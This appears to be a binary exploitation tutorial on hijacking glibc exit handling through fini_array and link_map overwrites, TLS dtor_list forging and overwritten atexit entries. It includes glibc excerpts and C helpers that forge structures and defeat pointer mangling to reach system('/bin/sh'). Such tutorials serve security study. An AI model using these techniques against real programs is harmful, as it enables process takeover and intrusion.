
WWW2Exec - atexit(), TLS Storage & Other mangled Pointers


__atexit Structures

[!CAUTION] Nowadays it is very rare for this to be exploitable!

atexit() registers the functions that are passed to it as parameters. These functions are executed when the program calls exit() or returns from main.

If you can modify the address of any of these functions so that it points to, for example, shellcode, you gain control of the process. Nowadays this is more complicated: the addresses of the functions to execute are hidden behind several structures, and the stored values are not the function addresses themselves but are mangled with an XOR and a bit rotation using a random key. As a result, this attack vector is currently not very useful, at least on x86 and x86_64.

The mangling function is PTR_MANGLE. On some other architectures, such as m68k, mips32, mips64, aarch64, arm, hppa..., PTR_MANGLE has been reported to return its input unchanged, so those targets would be attackable through this vector. This depends on the glibc version, so check the implementation for your target.

You can find an in-depth explanation of how this works in https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html

As explained in this post, if the program exits by returning from main or by calling exit(), it runs __run_exit_handlers(), which calls the registered destructors.

[!CAUTION] If the program exits via the _exit() function, it calls the exit syscall directly and the exit handlers are not executed. So, to confirm that __run_exit_handlers() is executed, you can set a breakpoint on it.
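The difference between exit() and _exit() can be observed with a small test program. The following is a minimal sketch for a POSIX system; the helper names (emit, handler_a, handler_b, run_child) are hypothetical and only serve the illustration. A forked child registers two handlers that write a letter to a pipe, then terminates either way, and the parent collects what the handlers wrote.

```c
#include <assert.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

static int out_fd = -1;  /* write end of the pipe, used by the handlers */

static void emit(char c)
{
    ssize_t r = write(out_fd, &c, 1);
    (void) r;  /* best effort: nothing useful to do on failure here */
}

static void handler_a(void) { emit('A'); }
static void handler_b(void) { emit('B'); }

/* Fork a child that registers two handlers and terminates with exit()
   or _exit().  The letters written by the handlers are returned in buf
   as a NUL-terminated string; the return value is their count.  */
static int run_child(int use_underscore_exit, char *buf, size_t buflen)
{
    int fds[2];
    assert(buf != NULL && buflen > 0);
    if (pipe(fds) != 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        close(fds[0]);
        out_fd = fds[1];
        atexit(handler_a);   /* registered first, runs last */
        atexit(handler_b);   /* registered last, runs first */
        if (use_underscore_exit)
            _exit(0);        /* exit syscall only: handlers are skipped */
        exit(0);             /* goes through the exit handlers */
    }

    close(fds[1]);
    size_t total = 0;
    ssize_t n;
    while (total < buflen - 1
           && (n = read(fds[0], buf + total, buflen - 1 - total)) > 0)
        total += (size_t) n;
    buf[total] = '\0';
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return (int) total;
}
```

Calling run_child(0, buf, sizeof buf) should leave "BA" in buf (handlers run in reverse registration order), while run_child(1, buf, sizeof buf) should leave it empty.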

The important code is (source):

ElfW(Dyn) *fini_array = map->l_info[DT_FINI_ARRAY];
if (fini_array != NULL)
  {
    ElfW(Addr) *array = (ElfW(Addr) *) (map->l_addr + fini_array->d_un.d_ptr);
    size_t sz = (map->l_info[DT_FINI_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr)));

    while (sz-- > 0)
      ((fini_t) array[sz]) ();
  }
  [...]




// This is the d_un union
ptype l->l_info[DT_FINI_ARRAY]->d_un
type = union {
    Elf64_Xword d_val;  // integer view of the 8 bytes (both members share the same storage)
    Elf64_Addr d_ptr;   // same 8 bytes read as an offset from l->l_addr to the array of functions
}

Note how map->l_addr + fini_array->d_un.d_ptr is used to calculate the position of the array of functions to call.

There are a couple of options:

  • Overwrite the value of map->l_addr so that map->l_addr + fini_array->d_un.d_ptr points to a fake fini_array holding the addresses of the code to execute.
  • Overwrite the l_info[DT_FINI_ARRAY] and l_info[DT_FINI_ARRAYSZ] entries (which are more or less consecutive in memory) to make them point to a forged Elf64_Dyn structure, so that array again points to a memory region the attacker controls.
  • This writeup overwrites l_info[DT_FINI_ARRAY] with the address of controlled memory in .bss containing a fake fini_array. The fake array holds first a one gadget address, which will be executed, and then the difference between the address of this fake array and the value of map->l_addr, so that array points to the fake array itself.
  • According to the main post of this technique and this writeup, ld.so leaves a pointer on the stack that points to the binary's link_map in ld.so. With an arbitrary write it's possible to overwrite it and make it point to a fake fini_array controlled by the attacker, containing for example the address of a one gadget.
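The arithmetic behind the forged structure in the third option can be sketched as follows. This is only an illustration under assumptions: it uses the Elf64_Dyn type from the Linux <elf.h> header, the function names are hypothetical, and it assumes (as the writeup's layout implies) that the first 8 bytes of the fake entry are not checked as a tag, so they can hold the target address.

```c
#include <assert.h>
#include <elf.h>
#include <stdint.h>

/* Same arithmetic as the quoted loader code: array = l_addr + d_un.d_ptr. */
static uint64_t fini_array_location(uint64_t l_addr, const Elf64_Dyn *dyn)
{
    return l_addr + dyn->d_un.d_ptr;
}

/* Build the 16-byte fake entry: the first 8 bytes hold the target
   address, the next 8 bytes hold (address of the fake entry - l_addr).
   With that offset, array resolves to the fake entry itself, so
   array[0] is the target.  The subtraction wraps modulo 2^64 when the
   fake entry sits below l_addr, which still resolves correctly.  */
static Elf64_Dyn forge_fini_dyn(uint64_t l_addr, uint64_t fake_dyn_addr,
                                uint64_t target)
{
    Elf64_Dyn fake;
    fake.d_tag = (Elf64_Sxword) target;       /* assumption: tag not checked */
    fake.d_un.d_ptr = fake_dyn_addr - l_addr;
    return fake;
}

/* DT_FINI_ARRAYSZ stores a size in bytes; the loader divides it by
   sizeof (ElfW(Addr)) to get the number of entries to call.  */
static Elf64_Dyn forge_fini_arraysz(uint64_t entries)
{
    Elf64_Dyn fake;
    fake.d_tag = DT_FINI_ARRAYSZ;
    fake.d_un.d_val = entries * sizeof(Elf64_Addr);
    return fake;
}
```

For instance, with a hypothetical l_addr of 0x555555554000 and a fake entry at 0x555555558040, the stored offset would be 0x4040.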

Right after the previous code there is another interesting section:

/* Next try the old-style destructor.  */
ElfW(Dyn) *fini = map->l_info[DT_FINI];
if (fini != NULL)
  DL_CALL_DT_FINI (map, ((void *) map->l_addr + fini->d_un.d_ptr));
}

In this case it would be possible to overwrite the value of map->l_info[DT_FINI] so that it points to a forged ElfW(Dyn) structure. Find more information here.

TLS-Storage dtor_list overwrite in __run_exit_handlers

As explained here, if a program exits by returning from main or by calling exit(), it executes __run_exit_handlers(), which calls any registered destructor functions.

Code from __run_exit_handlers():

/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered
   perform stdio cleanup, and terminate program execution with STATUS.  */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
                     bool run_list_atexit, bool run_dtors)
{
  /* First, call the TLS destructors.  */
#ifndef SHARED
  if (&__call_tls_dtors != NULL)
#endif
    if (run_dtors)
      __call_tls_dtors ();

Code from __call_tls_dtors():

typedef void (*dtor_func) (void *);
struct dtor_list //struct added
{
  dtor_func func;
  void *obj;
  struct link_map *map;
  struct dtor_list *next;
};

[...]
/* Call the destructors.  This is called either when a thread returns from the
   initial function or when the process exits via the exit function.  */
void
__call_tls_dtors (void)
{
  while (tls_dtor_list)     // parse the dtor_list chained structures
    {
      struct dtor_list *cur = tls_dtor_list;        // cur point to tls-storage dtor_list
      dtor_func func = cur->func;
      PTR_DEMANGLE (func);                      // demangle the function ptr

      tls_dtor_list = tls_dtor_list->next;      // next dtor_list structure
      func (cur->obj);
      [...]
    }
}

For each registered function in tls_dtor_list, it'll demangle the pointer from cur->func and call it with the argument cur->obj.
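The list walk can be modeled outside glibc to see how a forged chain turns into a sequence of controlled calls. The sketch below is a simplified model, not glibc code: the struct mirrors the field order shown above (with map kept as a plain void *), the demangling step and the elided [...] part of the loop are left out, and record_call is a hypothetical stand-in for the function an attacker would really target.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef void (*dtor_func)(void *);

/* Same field order as the dtor_list struct quoted above. */
struct fake_dtor_list {
    dtor_func func;
    void *obj;
    void *map;                    /* struct link_map * in glibc */
    struct fake_dtor_list *next;
};

/* Simplified model of the loop in __call_tls_dtors(): take the head,
   advance to the next node, call func(obj).  PTR_DEMANGLE and the
   elided part of the real loop are intentionally not modeled.  */
static int walk_dtor_list(struct fake_dtor_list *head)
{
    int calls = 0;
    while (head != NULL) {
        struct fake_dtor_list *cur = head;
        head = head->next;
        cur->func(cur->obj);
        calls++;
    }
    return calls;
}

/* Hypothetical callback: appends its string argument to a log so the
   order of the calls and their arguments can be inspected.  */
static char call_log[64];

static void record_call(void *obj)
{
    strncat(call_log, (const char *) obj,
            sizeof call_log - strlen(call_log) - 1);
}
```

Chaining two nodes whose obj fields are "A" and "B" and passing the first one to walk_dtor_list() should produce two calls and leave "AB" in call_log, which mirrors how each forged node contributes one function call with one controlled argument.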

Using the tls function from this fork of GEF, it's possible to see that the dtor_list is actually very close to the stack canary and the PTR_MANGLE cookie. So, with an overflow in that area it would be possible to overwrite both the cookie and the stack canary.

By overwriting the PTR_MANGLE cookie with 0x00, the XOR in PTR_DEMANGLE becomes a no-op, so the demangled address depends only on the value you stored. Then, by writing to the dtor_list, it's possible to chain several function calls, each with its function address and its argument.

Finally notice that the stored pointer is not only going to be xored with the cookie but also rotated 17 bits:

0x00007fc390444dd4 <+36>:   mov    rax,QWORD PTR [rbx]      --> mangled ptr
0x00007fc390444dd7 <+39>:   ror    rax,0x11             --> rotate of 17 bits
0x00007fc390444ddb <+43>:   xor    rax,QWORD PTR fs:0x30    --> xor with PTR_MANGLE

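So you need to take this into account before adding a new address: even with a zeroed cookie, the value you store must be the target address rotated left by 17 bits, so that the ror restores it.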
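The two steps seen in the disassembly (rotate right by 17, then XOR with the cookie) and their inverse can be written as a short sketch. It assumes the x86_64 scheme shown above; the function names are hypothetical and the cookie is passed explicitly instead of being read from fs:0x30.

```c
#include <assert.h>
#include <stdint.h>

/* 64-bit rotations; n is reduced modulo 64 to avoid undefined shifts. */
static uint64_t rol64(uint64_t v, unsigned n)
{
    n &= 63;
    return n ? (v << n) | (v >> (64 - n)) : v;
}

static uint64_t ror64(uint64_t v, unsigned n)
{
    n &= 63;
    return n ? (v >> n) | (v << (64 - n)) : v;
}

/* Inverse of the demangling below: XOR with the cookie, then rotate left. */
static uint64_t ptr_mangle(uint64_t ptr, uint64_t cookie)
{
    return rol64(ptr ^ cookie, 17);
}

/* What the disassembly does: ror by 0x11, then XOR with the cookie. */
static uint64_t ptr_demangle(uint64_t stored, uint64_t cookie)
{
    return ror64(stored, 17) ^ cookie;
}
```

With the cookie zeroed, the value to write is simply rol64(target, 17); for example, ptr_mangle(1, 0) gives 0x20000.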

Find an example in the original post.

Other mangled pointers in __run_exit_handlers

This technique is explained here and again depends on the program exiting by returning from main or by calling exit(), so that __run_exit_handlers() is called.

Let's check more code of this function:

  while (true)
    {
      struct exit_function_list *cur;

    restart:
      cur = *listp;

      if (cur == NULL)
        {
          /* Exit processing complete.  We will not allow any more
             atexit/on_exit registrations.  */
          __exit_funcs_done = true;
          break;
        }

      while (cur->idx > 0)
        {
          struct exit_function *const f = &cur->fns[--cur->idx];
          const uint64_t new_exitfn_called = __new_exitfn_called;

          switch (f->flavor)
            {
              void (*atfct) (void);
              void (*onfct) (int status, void *arg);
              void (*cxafct) (void *arg, int status);
              void *arg;

            case ef_free:
            case ef_us:
              break;
            case ef_on:
              onfct = f->func.on.fn;
              arg = f->func.on.arg;
              PTR_DEMANGLE (onfct);

              /* Unlock the list while we call a foreign function.  */
              __libc_lock_unlock (__exit_funcs_lock);
              onfct (status, arg);
              __libc_lock_lock (__exit_funcs_lock);
              break;
            case ef_at:
              atfct = f->func.at;
              PTR_DEMANGLE (atfct);

              /* Unlock the list while we call a foreign function.  */
              __libc_lock_unlock (__exit_funcs_lock);
              atfct ();
              __libc_lock_lock (__exit_funcs_lock);
              break;
            case ef_cxa:
              /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
                 we must mark this function as ef_free.  */
              f->flavor = ef_free;
              cxafct = f->func.cxa.fn;
              arg = f->func.cxa.arg;
              PTR_DEMANGLE (cxafct);

              /* Unlock the list while we call a foreign function.  */
              __libc_lock_unlock (__exit_funcs_lock);
              cxafct (arg, status);
              __libc_lock_lock (__exit_funcs_lock);
              break;
            }

          if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
            /* The last exit function, or another thread, has registered
               more exit functions.  Start the loop over.  */
            goto restart;
        }

      *listp = cur->next;
      if (*listp != NULL)
        /* Don't free the last element in the chain, this is the statically
           allocate element.  */
        free (cur);
    }

  __libc_lock_unlock (__exit_funcs_lock);

The variable f points to an entry of the initial structure, and depending on the value of f->flavor a different function is called. The location of the function address depends on that value, but it is always demangled before the call.

Moreover, in the options ef_on and ef_cxa it's also possible to control an argument.
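The dispatch above can be summarized with a small model that tells, for a given entry, which stored pointer would be used and in which parameter position the controlled argument ends up. This is a sketch under assumptions: the struct is a hypothetical mirror of the entry layout implied by the quoted code (pointers stored as raw 64-bit values, x86_64 sizes), the flavor values are taken to follow the declaration order ef_free, ef_us, ef_on, ef_at, ef_cxa, and the dso_handle field is assumed from the glibc headers.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed flavor numbering: 0 to 4 in this order. */
enum { ef_free, ef_us, ef_on, ef_at, ef_cxa };

/* Hypothetical mirror of one exit handler entry on x86_64. */
struct fake_exit_function {
    uint64_t flavor;
    union {
        uint64_t at;
        struct { uint64_t fn; uint64_t arg; } on;
        struct { uint64_t fn; uint64_t arg; uint64_t dso_handle; } cxa;
    } func;
};

struct call_plan {
    int will_call;        /* 0 for ef_free and ef_us                       */
    uint64_t mangled_fn;  /* stored pointer, still mangled                 */
    int arg_position;     /* 0: no arg, 1: first param, 2: second param    */
    uint64_t arg;
};

/* Mirrors the switch on f->flavor: ef_on calls fn(status, arg),
   ef_at calls fn(), ef_cxa calls fn(arg, status).  */
static struct call_plan plan_for(const struct fake_exit_function *f)
{
    struct call_plan p = { 0, 0, 0, 0 };
    switch (f->flavor) {
    case ef_on:
        p.will_call = 1; p.mangled_fn = f->func.on.fn;
        p.arg_position = 2; p.arg = f->func.on.arg;
        break;
    case ef_at:
        p.will_call = 1; p.mangled_fn = f->func.at;
        break;
    case ef_cxa:
        p.will_call = 1; p.mangled_fn = f->func.cxa.fn;
        p.arg_position = 1; p.arg = f->func.cxa.arg;
        break;
    default:
        break;
    }
    return p;
}
```

The model makes one design point visible: only ef_cxa places the controlled value in the first parameter, which is why a cxa entry is the natural choice when the goal is a call that takes a single pointer argument.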

It's possible to check the initial structure in a debugging session with GEF by running gef> p initial.

To abuse this you need to either leak or erase the PTR_MANGLE cookie and then overwrite a cxa entry in initial so that it calls system('/bin/sh').

You can find an example of this in the original blog post about the technique.
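One way to think about the "leak" option: if a stored (mangled) pointer can be read and its real target is already known, the cookie follows from inverting the x86_64 scheme (rotate right by 17, then XOR). The sketch below only shows that arithmetic; the function names are hypothetical, and having both a readable mangled entry and its known plain address is an assumption about the target, not something the technique guarantees.

```c
#include <assert.h>
#include <stdint.h>

static uint64_t rotl17(uint64_t v) { return (v << 17) | (v >> 47); }
static uint64_t rotr17(uint64_t v) { return (v >> 17) | (v << 47); }

/* demangle(stored) = rotr17(stored) ^ cookie = known_ptr
   therefore cookie = rotr17(stored) ^ known_ptr.  */
static uint64_t recover_cookie(uint64_t stored, uint64_t known_ptr)
{
    return rotr17(stored) ^ known_ptr;
}

/* Value to write into the fn field so that it demangles to target. */
static uint64_t mangle_with(uint64_t target, uint64_t cookie)
{
    return rotl17(target ^ cookie);
}
```

A forged cxa entry would then store mangle_with(target, cookie) as its function pointer and the address of the command string as its argument; with an erased (zero) cookie, mangle_with(target, 0) reduces to a plain 17-bit left rotation.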
